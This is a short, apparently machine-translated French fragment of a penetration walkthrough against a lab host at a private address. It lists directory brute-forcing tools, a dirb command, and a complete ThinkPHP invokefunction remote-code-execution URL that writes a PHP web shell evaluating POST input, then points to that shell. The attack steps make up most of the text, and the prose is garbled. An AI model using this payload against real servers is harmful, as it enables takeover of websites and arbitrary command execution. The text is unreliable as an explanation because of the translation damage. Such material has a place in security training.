2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Table des matières
Faisons exploser d'abord pour voir s'il existe un moyen d'attaquer.
Modifiez et écrivez sur php avec succès, récupérez-le simplement le lendemain
Lien d'essai de l'épée fourmi rce
Vous pouvez essayer dirsearch, dirb, gobuster et d'autres outils
dirb http://192.168.20.130/
http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
http://192.168.20.130/public/shell.php